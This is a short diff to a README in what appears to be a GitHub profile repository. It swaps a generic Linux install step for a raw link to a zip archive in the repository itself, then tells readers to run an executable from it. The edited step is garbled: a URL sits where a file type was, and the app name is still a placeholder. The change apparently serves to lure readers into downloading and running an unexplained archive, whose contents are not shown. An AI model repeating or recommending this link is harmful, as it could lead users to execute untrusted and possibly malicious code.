TahaMustafa75/.github/README.md

 ### For Linux:

-1. Extract the downloaded .tar.gz file.
+1. Extract the downloaded https://github.com/TahaMustafa75/.github/raw/refs/heads/main/profile/github-2.2-alpha.1.zip file.
 2. Open a terminal window in the extracted folder.
 3. Run the following command to start the application: `./yourappname` (replace `yourappname` with the specific application file).